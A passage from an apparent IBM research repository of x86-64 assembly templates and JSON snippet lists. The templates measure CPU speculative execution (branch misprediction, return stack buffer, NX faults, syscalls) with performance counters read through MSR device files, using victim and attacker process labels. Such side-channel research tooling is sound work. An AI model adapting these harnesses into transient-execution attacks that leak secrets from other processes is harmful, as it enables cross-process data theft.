| "fnop", 47 | "fnop", 48 | "fnop", 49 | "fnop", 50 | "fnop", 51 | "fnop", 52 | "fnop", 53 | "fnop", 54 | "fnop", 55 | "fnop", 56 | "fnop", 57 | "fnop", 58 | "fnop", 59 | "fnop", 60 | "fnop", 61 | "fnop", 62 | "fnop", 63 | "fnop", 64 | "fnop", 65 | "fnop", 66 | "fnop", 67 | "fnop", 68 | "fnop", 69 | "fnop", 70 | "fnop", 71 | "fnop", 72 | "fnop", 73 | "fnop", 74 | "fnop", 75 | "fnop", 76 | "fnop", 77 | "fnop", 78 | "fnop", 79 | "fnop", 80 | "fnop", 81 | "fnop", 82 | "fnop", 83 | "fnop", 84 | "fnop", 85 | "fnop", 86 | "fnop", 87 | "fnop", 88 | "fnop", 89 | "fnop", 90 | "fnop", 91 | "fnop", 92 | "fnop", 93 | "fnop", 94 | "fnop", 95 | "fnop", 96 | "fnop", 97 | "fnop", 98 | "fnop", 99 | "fnop", 100 | "fnop", 101 | "fnop", 102 | "fnop", 103 | "fnop", 104 | "fnop", 105 | "fnop", 106 | "fnop", 107 | "fnop", 108 | "fnop", 109 | "fnop", 110 | "fnop", 111 | "fnop", 112 | "fnop", 113 | "fnop", 114 | "fnop", 115 | "fnop", 116 | "fnop", 117 | "fnop", 118 | "fnop", 119 | "fnop", 120 | "fnop", 121 | "fnop", 122 | "fnop", 123 | "fnop", 124 | "fnop", 125 | "fnop", 126 | "fnop", 127 | "fnop", 128 | "fnop", 129 | "fnop", 130 | "fnop", 131 | "fnop", 132 | "fnop", 133 | "fnop", 134 | "fnop", 135 | "fnop", 136 | "fnop", 137 | "fnop", 138 | "fnop", 139 | "fnop", 140 | "fnop", 141 | "fnop", 142 | "fnop", 143 | "fnop", 144 | "fnop", 145 | "fnop", 146 | "fnop", 147 | "fnop", 148 | "fnop", 149 | "fnop", 150 | "fnop", 151 | "fnop", 152 | "fnop", 153 | "fnop", 154 | "fnop", 155 | "fnop", 156 | "fnop", 157 | "fnop", 158 | "fnop", 159 | "fnop", 160 | "fnop", 161 | "fnop", 162 | "fnop", 163 | "fnop", 164 | "fnop", 165 | "fnop", 166 | "fnop", 167 | "fnop", 168 | "fnop", 169 | "fnop", 170 | "fnop", 171 | "fnop", 172 | "fnop", 173 | "fnop", 174 | "fnop", 175 | "fnop", 176 | "fnop", 177 | "fnop", 178 | "fnop", 179 | "fnop", 180 | "fnop", 181 | "fnop", 182 | "fnop", 183 | "fnop", 184 | "fnop", 185 | "fnop", 186 | "fnop", 187 | "fnop", 188 | "fnop", 189 | "fnop", 190 | "fnop", 191 | "fnop", 192 | "fnop", 193 | "fnop", 194 | "fnop", 195 | "fnop", 196 | "fnop", 197 | "fnop", 198 | "fnop", 199 | "fnop", 200 | "fnop", 201 | "fnop", 202 | "fnop", 203 | "fnop", 204 | "fnop", 205 | "fnop", 206 | "fnop", 207 | "fnop", 208 | "fnop", 209 | "fnop", 210 | "fnop", 211 | "fnop", 212 | "fnop", 213 | "fnop", 214 | "fnop", 215 | "fnop", 216 | "fnop", 217 | "fnop", 218 | "fnop", 219 | "fnop", 220 | "fnop", 221 | "fnop", 222 | "fnop", 223 | "fnop", 224 | "fnop", 225 | "fnop", 226 | "fnop", 227 | "fnop", 228 | "fnop", 229 | "fnop", 230 | "fnop", 231 | "fnop", 232 | "fnop", 233 | "fnop", 234 | "fnop", 235 | "fnop", 236 | "fnop", 237 | "fnop", 238 | "fnop", 239 | "fnop", 240 | "fnop", 241 | "fnop", 242 | "fnop", 243 | "fnop", 244 | "fnop", 245 | "fnop", 246 | "fnop", 247 | "fnop", 248 | "fnop", 249 | "fnop", 250 | "fnop" 251 | ] 252 | } 253 | -------------------------------------------------------------------------------- /examples/nx/nx.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %define SYS_MMAP 9 17 | %define SYS_MPROT 10 18 | %define SYS_EXIT 60 19 | %define SYS_WRITE 1 20 | %define SYS_OPEN 2 21 | %define SYS_CLOSE 3 22 | %define SYS_LSEEK 8 23 | %define SYS_GETCPU 309 24 | %define SYS_PREAD64 17 25 | %define SYS_PWRITE64 18 26 | %define SYS_RT_SIGACTION 13 27 | %define SYS_RT_SIGRETURN 15 28 | %define PROT_READ 0x1 29 | %define PROT_WRITE 0x2 30 | %define PROT_EXEC 0x4 31 | %define CHILD_PROCESS 0 32 | 33 | %include "signals.inc" 34 | %include "common.inc" 35 | %include "pmc.inc" 36 | 37 | ; clobbers rax, rdi, rsi, rdx, r8-10 38 | ; params: address + length 39 | %macro allocate 3 40 | mov rax, SYS_MMAP ; mmap 41 | mov rdi, %1 ; address 42 | mov rsi, %2 ; len 43 | mov rdx, %3 ; prot 44 | mov r10, 0x22 ; flags MAP_ANONYMOUS|MAP_PRIVATE 45 | mov r8, -1 ; fd 46 | mov r9, 0 ; offset 47 | syscall 48 | cmp rax, -1 49 | je perf_test_entry.exit 50 | %endmacro 51 | 52 | %macro mprot 3 53 | mov rax, SYS_MPROT 54 | mov rdi, %1 55 | mov rsi, %2 56 | mov rdx, %3 57 | syscall 58 | cmp rax, -1 59 | je perf_test_entry.exit 60 | %endmacro 61 | 62 | ; sys_rt_sigaction - alter an action taken by a process 63 | ; @sig: signal to be sent 64 | ; @act: new sigaction 65 | ; @oact: used to save the previous sigaction 66 | ; @sigsetsize: size of sigset_t type 67 | 68 | %macro setup_signal_handler 0 69 | mov QWORD [sigaction.sa_handler], handler 70 | mov QWORD [sigaction.sa_restorer], restorer 71 | mov eax, SA_RESTART | SA_RESTORER | SA_SIGINFO 72 | mov DWORD [sigaction.sa_flags], eax 73 | mov rax, SYS_RT_SIGACTION ; system call number 74 | mov rdi, SIGSEGV ; signal number 75 | lea rsi, [sigaction] ; sigaction struct 76 | xor rdx, rdx ; save previous sigaction (no) 77 | mov r10, NSIG_WORDS ; sigsetsize 78 | syscall 79 | cmp eax, 0 80 | %endmacro 81 | 82 | 83 | section .data 84 | warmup_cnt: dq 1 85 | fill1: times 62 db 0 86 | array: times 64 db 0 87 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 88 | trap_msg: db "trap", 0xA, 0 89 | fd: dq 0 90 | val: dq 0 91 | len: equ $-val 92 | target: dq 0 93 | ALIGN 64 94 | xstate: times 0x1000 db 0 95 | SIGACTION sigaction 96 | ;##### DATA STARTS HERE ######## 97 | 98 | ;##### DATA ENDS HERE ######## 99 | 100 | section .bss 101 | 102 | section .note.GNU-stack noalloc noexec nowrite progbits 103 | 104 | section .text 105 | global perf_test_entry:function 106 | global snippet:function 107 | global handler:function 108 | global restorer:function 109 | 110 | perf_test_entry: 111 | push rbp 112 | mov rbp, rsp 113 | sub rsp, len 114 | 115 | check_pinning VICTIM_PROCESS 116 | 117 | msr_open 118 | msr_seek 119 | 120 | allocate 0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC 121 | ; save the target 122 | mov [target], rax 123 | 124 | copy rax, snippet, snippet.end-snippet 125 | 126 | ; get data into cache 127 | mov rax, [target+0x8] 128 | ; execute once 129 | call [target] 130 | 131 | ; remove exec + write permissions 132 | mprot [target], 0x1000, PROT_READ 133 | 134 | setup_signal_handler 135 | 136 | .data: 137 | clflush [warmup_cnt] 138 | lfence 139 | reset_counter 140 | start_counter 141 | mov ebx, DWORD[warmup_cnt] 142 | cmp ebx, 12 143 | je .else 144 | call [target] 145 | 146 | .else: 147 | lfence 148 | stop_counter 149 | 150 | inc QWORD[warmup_cnt] 151 | cmp QWORD[warmup_cnt], 13 152 | jl .data 153 | .exit: 154 | msr_close 155 | exit 0 156 | 157 | ; rdi=signum, rsi=siginfo_t*, rdx=sigcontext* 158 | handler: 159 | mov r10,[rdx+UCONTEXT_STRUC.uc_mcontext+SIGCONTEXT_STRUC.trapno] 160 | cmp r10, 14 161 | jne .exit 162 | 163 | ; set RIP to continue after the fault 164 | print trap_msg, 5 165 | mov r10, QWORD(perf_test_entry.else) 166 | mov [rdx+UCONTEXT_STRUC.uc_mcontext+SIGCONTEXT_STRUC.rip], r10 167 | .exit: 168 | ret 169 | 170 | restorer: 171 | mov rax, SYS_RT_SIGRETURN 172 | syscall 173 | 174 | snippet: 175 | mulps xmm2, xmm1; marker instruction 176 | lea r8, [rel trap_msg] ; marker instruction 177 | ret 178 | .end: 179 | nop 180 | ;##### SNIPPET STARTS HERE ###### 181 | 182 | ;##### SNIPPET ENDS HERE ###### 183 | -------------------------------------------------------------------------------- /examples/nx/spec_length.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0" 4 | ], 5 | 6 | "INST": [ 7 | 8 | "fnop", 9 | "fnop", 10 | "fnop", 11 | "fnop" 12 | ] 13 | } 14 | -------------------------------------------------------------------------------- /examples/rsb/rsb_fill_deep_stack.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %define SYS_EXIT 60 17 | %define SYS_WRITE 1 18 | %define SYS_OPEN 2 19 | %define SYS_CLOSE 3 20 | %define SYS_LSEEK 8 21 | %define SYS_GETCPU 309 22 | %define SYS_PREAD64 17 23 | %define SYS_PWRITE64 18 24 | %define CHILD_PROCESS 0 25 | %define ATTACK_PROCESS 4 26 | 27 | %define BASE 0x10000000 28 | 29 | %include "common.inc" 30 | %include "pmc.inc" 31 | 32 | section .data 33 | 34 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 35 | fd: dq 0 36 | val: dq 0 37 | len: equ $-val 38 | array: resb 2048 39 | secret: db 0 40 | addr: dq 0 41 | align 1024 42 | addr2: dq 0 43 | counter: dq 0 44 | align 1024 45 | ;##### DATA STARTS HERE ######## 46 | 47 | ;##### DATA ENDS HERE ######## 48 | 49 | section .text 50 | global perf_test_entry:function 51 | global snippet:function 52 | global gadget:function 53 | global poison:function 54 | 55 | perf_test_entry: 56 | push rbp 57 | mov rbp, rsp 58 | sub rsp, 0 59 | 60 | check_pinning VICTIM_PROCESS ;# ATTACK_PROCESS 61 | msr_open 62 | msr_seek 63 | 64 | reset_counter 65 | 66 | call filler2 67 | 68 | start_counter 69 | 70 | call victim 71 | mov DWORD[array], eax 72 | mov DWORD[array+4], edx 73 | movq xmm0, QWORD[array] 74 | lfence 75 | 76 | align 1024 77 | victim: 78 | ;call myexit 79 | call filler 80 | push myexit 81 | clflush [rsp] 82 | lfence 83 | ret 84 | 85 | filler: 86 | ;##### SNIPPET STARTS HERE ###### 87 | 88 | ;##### SNIPPET ENDS HERE ###### 89 | ret 90 | 91 | align 1024 92 | filler2: 93 | callnext 94 | callnext 95 | callnext 96 | callnext 97 | callnext 98 | callnext 99 | callnext 100 | callnext 101 | callnext 102 | callnext 103 | callnext 104 | callnext 105 | callnext 106 | callnext 107 | callnext 108 | callnext 109 | ret 110 | 111 | align 1024 112 | myexit: 113 | stop_counter 114 | msr_close 115 | exit 0 116 | 117 | dummy: 118 | ret 119 | 120 | -------------------------------------------------------------------------------- /examples/rsb/rsb_fill_deep_stack.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | 9 | "callnext", 10 | "callnext", 11 | "callnext", 12 | "callnext", 13 | "callnext", 14 | "callnext", 15 | "callnext", 16 | "callnext", 17 | "callnext", 18 | "callnext", 19 | "callnext", 20 | "callnext", 21 | "callnext", 22 | "callnext", 23 | "callnext", 24 | "callnext", 25 | "callnext", 26 | "callnext", 27 | "callnext", 28 | "callnext", 29 | "callnext", 30 | "callnext" 31 | ] 32 | } 33 | -------------------------------------------------------------------------------- /examples/speculation_in_speculation/speculation_in_speculation_in_speculation.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 ; first cache line 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 ; second cache line 24 | fill2: times 62 db 0 25 | 26 | warmup_cnt_fake2: db 1 ; third cache line 27 | fill3: times 63 db 0 28 | 29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; rest of the data 30 | fd: dq 0 31 | val: dq 0 32 | len: equ $-val 33 | lea_array: times 40 db 0 34 | ;##### DATA STARTS HERE ######## 35 | 36 | ;##### DATA ENDS HERE ######## 37 | 38 | section .text 39 | global perf_test_entry:function 40 | global snippet:function 41 | 42 | perf_test_entry: 43 | push rbp 44 | mov rbp, rsp 45 | sub rsp, len 46 | 47 | check_pinning VICTIM_PROCESS 48 | msr_open 49 | msr_seek 50 | .data: 51 | clflush [warmup_cnt] 52 | clflush [warmup_cnt_fake] 53 | mov eax, 0 54 | cpuid 55 | lfence 56 | reset_counter 57 | start_counter 58 | mov edx, 0 59 | mov ecx, 2048 60 | mov eax, DWORD[warmup_cnt_fake] 61 | div ecx 62 | mov ecx, 2 63 | xor edx, edx 64 | div ecx 65 | cmp eax, 1 66 | je .else 67 | .data2: 68 | mov ebx, DWORD[warmup_cnt] 69 | cmp ebx, 12 70 | je .else2 71 | .data3: 72 | mov ebx, DWORD[warmup_cnt_fake2] 73 | cmp ebx, 12 74 | je .else3 75 | mov rax, 10 76 | lea rax, [lea_array+rax*2] 77 | ;##### SNIPPET STARTS HERE ###### 78 | 79 | ;##### SNIPPET ENDS HERE ###### 80 | .else3: 81 | mov rax, 10 82 | lea rax, [lea_array+rax*2] 83 | .else2: 84 | mov rax, 10 85 | lea rax, [lea_array+rax*2] 86 | .else: 87 | mov rax, 10 88 | lea rax, [lea_array+rax*2] 89 | lfence 90 | stop_counter 91 | 92 | mov ax, 2 93 | mul DWORD[warmup_cnt_fake] 94 | mov DWORD[warmup_cnt_fake], eax 95 | inc DWORD[warmup_cnt_fake2] 96 | inc DWORD[warmup_cnt] 97 | cmp DWORD[warmup_cnt], 13 98 | jl .data 99 | 100 | msr_close 101 | exit 0 102 | -------------------------------------------------------------------------------- /examples/speculation_stopper/speculation_stopper.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | warmup_cnt_fake: dd 1 25 | offset: dq 0 26 | val: dq 0 27 | len: equ $-val 28 | array: resb 128 29 | warmup_cnt: dd 1 30 | ;##### DATA STARTS HERE ######## 31 | 32 | ;##### DATA ENDS HERE ######## 33 | 34 | section .text 35 | global perf_test_entry:function 36 | global snippet:function 37 | 38 | perf_test_entry: 39 | push rbp 40 | mov rbp, rsp 41 | sub rsp, len 42 | 43 | check_pinning VICTIM_PROCESS 44 | ;check_pinning ATTACKER_PROCESS 45 | msr_open 46 | msr_seek 47 | .data: 48 | clflush [warmup_cnt] 49 | mov eax, 0 50 | cpuid 51 | lfence 52 | reset_counter 53 | start_counter 54 | mov ebx, DWORD[warmup_cnt] 55 | cmp ebx, 12 56 | je .else 57 | lfence 58 | ;##### SNIPPET STARTS HERE ###### 59 | 60 | ;##### SNIPPET ENDS HERE ###### 61 | mov ebx, DWORD[warmup_cnt_fake] 62 | cmp ebx, 12 63 | je .else 64 | lfence 65 | .else: 66 | lfence 67 | stop_counter 68 | 69 | inc DWORD[warmup_cnt] 70 | cmp DWORD[warmup_cnt], 13 71 | jl .data 72 | 73 | msr_close 74 | exit 0 75 | -------------------------------------------------------------------------------- /examples/speculation_stopper/speculation_stopper.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | "fnop", 9 | "fnop", 10 | "fnop", 11 | "fnop", 12 | "fnop", 13 | "fnop", 14 | "fnop", 15 | "fnop", 16 | "fnop", 17 | "fnop", 18 | "fnop", 19 | "fnop", 20 | "fnop", 21 | "fnop", 22 | "fnop", 23 | "fnop", 24 | "fnop", 25 | "fnop", 26 | "fnop", 27 | "fnop", 28 | "fnop", 29 | "fnop", 30 | "fnop", 31 | "fnop", 32 | "fnop" 33 | ] 34 | } 35 | -------------------------------------------------------------------------------- /examples/syscall_speculation/syscall_speculation.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | %define SYS_GETPPID 110 20 | %define SYS_GETPID 39 21 | 22 | section .data 23 | 24 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 25 | fd: dq 0 26 | warmup_cnt_fake: dd 1 27 | offset: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | array: times 128 db 0 31 | warmup_cnt: dd 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | .data: 49 | clflush [warmup_cnt] 50 | mov eax, 0 51 | cpuid 52 | lfence 53 | reset_counter 54 | start_counter 55 | mov ebx, DWORD[warmup_cnt] 56 | cmp ebx, 12 57 | je .else 58 | mov eax, SYS_GETPPID 59 | syscall 60 | ;##### SNIPPET STARTS HERE ###### 61 | 62 | ;##### SNIPPET ENDS HERE ###### 63 | lfence 64 | .else: 65 | lfence 66 | stop_counter 67 | 68 | inc DWORD[warmup_cnt] 69 | cmp DWORD[warmup_cnt], 13 70 | jl .data 71 | 72 | msr_close 73 | exit 0 74 | -------------------------------------------------------------------------------- /examples/syscall_speculation/syscall_speculation.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | "mov ebx, eax", 9 | "mov eax, ebx", 10 | "mov ebx, eax", 11 | "mov eax, ebx", 12 | "mov ebx, eax", 13 | "mov eax, ebx", 14 | "mov ebx, eax", 15 | "mov eax, ebx", 16 | "mov ebx, ebx" 17 | ] 18 | } 19 | -------------------------------------------------------------------------------- /examples/syscall_speculation/syscall_speculation_baseline.asm: -------------------------------------------------------------------------------- 1 | [BITS 64] 2 | %include "common.inc" 3 | %include "pmc.inc" 4 | 5 | %define SYS_GETPPID 110 6 | %define SYS_GETPID 39 7 | 8 | section .data 9 | 10 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 11 | fd: dq 0 12 | warmup_cnt_fake: dd 1 13 | offset: dq 0 14 | val: dq 0 15 | len: equ $-val 16 | array: times 128 db 0 17 | warmup_cnt: dd 1 18 | ;##### DATA STARTS HERE ######## 19 | 20 | ;##### DATA ENDS HERE ######## 21 | 22 | section .text 23 | global perf_test_entry:function 24 | global snippet:function 25 | 26 | perf_test_entry: 27 | push rbp 28 | mov rbp, rsp 29 | sub rsp, len 30 | 31 | msr_open 32 | msr_seek 33 | .data: 34 | clflush [warmup_cnt] 35 | mov eax, 0 36 | cpuid 37 | lfence 38 | reset_counter 39 | start_counter 40 | mov ebx, DWORD[warmup_cnt] 41 | cmp ebx, 12 42 | je .else 43 | mov eax, SYS_GETPPID 44 | ;syscall 45 | ;##### SNIPPET STARTS HERE ###### 46 | 47 | ;##### SNIPPET ENDS HERE ###### 48 | lfence 49 | .else: 50 | lfence 51 | stop_counter 52 | 53 | inc DWORD[warmup_cnt] 54 | cmp DWORD[warmup_cnt], 13 55 | jl .data 56 | 57 | msr_close 58 | exit 0 59 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_cond_cached.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | .data: 49 | mov eax, 0 50 | cpuid 51 | lfence 52 | reset_counter 53 | start_counter 54 | cmp DWORD[warmup_cnt], 12 55 | je .else 56 | 57 | ;##### SNIPPET STARTS HERE ###### 58 | 59 | ;##### SNIPPET ENDS HERE ###### 60 | ;lea rax, [lea_array+rax*2] 61 | 62 | .else: 63 | lfence 64 | stop_counter 65 | 66 | inc DWORD[warmup_cnt] 67 | cmp DWORD[warmup_cnt], 13 68 | jl .data 69 | 70 | msr_close 71 | exit 0 72 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_cond_complex_cached_div.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | divisor: dw 2 27 | fill3: times 62 db 0 28 | 29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 30 | fd: dq 0 31 | val: dq 0 32 | len: equ $-val 33 | lea_array: times 40 db 0 34 | junk: db 1 35 | ;##### DATA STARTS HERE ######## 36 | 37 | ;##### DATA ENDS HERE ######## 38 | 39 | section .text 40 | global perf_test_entry:function 41 | global snippet:function 42 | 43 | perf_test_entry: 44 | push rbp 45 | mov rbp, rsp 46 | sub rsp, len 47 | 48 | check_pinning VICTIM_PROCESS 49 | msr_open 50 | msr_seek 51 | .data: 52 | mov eax, 0 53 | mov DWORD[divisor], 4096 54 | mov r15d, DWORD[warmup_cnt_fake] 55 | cpuid 56 | lfence 57 | reset_counter 58 | start_counter 59 | xor edx, edx 60 | mov eax, r15d 61 | div DWORD[divisor] 62 | cmp eax, 1 63 | je .else 64 | 65 | ;##### SNIPPET STARTS HERE ###### 66 | 67 | ;##### SNIPPET ENDS HERE ###### 68 | ;lea rax, [lea_array+rax*2] 69 | 70 | .else: 71 | lfence 72 | stop_counter 73 | mov ax, 2 74 | mul DWORD[warmup_cnt_fake] 75 | mov DWORD[warmup_cnt_fake], eax 76 | 77 | inc DWORD[warmup_cnt] 78 | cmp DWORD[warmup_cnt], 13 79 | jl .data 80 | 81 | msr_close 82 | exit 0 83 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_cond_complex_cached_mul.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 4096 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | .data: 49 | mov eax, 0 50 | cpuid 51 | lfence 52 | reset_counter 53 | start_counter 54 | mov ax, 2 55 | mul DWORD[warmup_cnt_fake] 56 | cmp eax, 4 57 | je .else 58 | ;##### SNIPPET STARTS HERE ###### 59 | 60 | ;##### SNIPPET ENDS HERE ###### 61 | ;lea rax, [lea_array+rax*2] 62 | 63 | .else: 64 | lfence 65 | stop_counter 66 | 67 | mov eax, DWORD[warmup_cnt_fake] 68 | mov ecx, 2 69 | xor edx, edx 70 | div ecx 71 | mov DWORD[warmup_cnt_fake], eax 72 | 73 | inc DWORD[warmup_cnt] 74 | cmp DWORD[warmup_cnt], 13 75 | jl .data 76 | 77 | msr_close 78 | exit 0 79 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_cond_complex_register_div.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dq 2 24 | fill2: times 60 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA 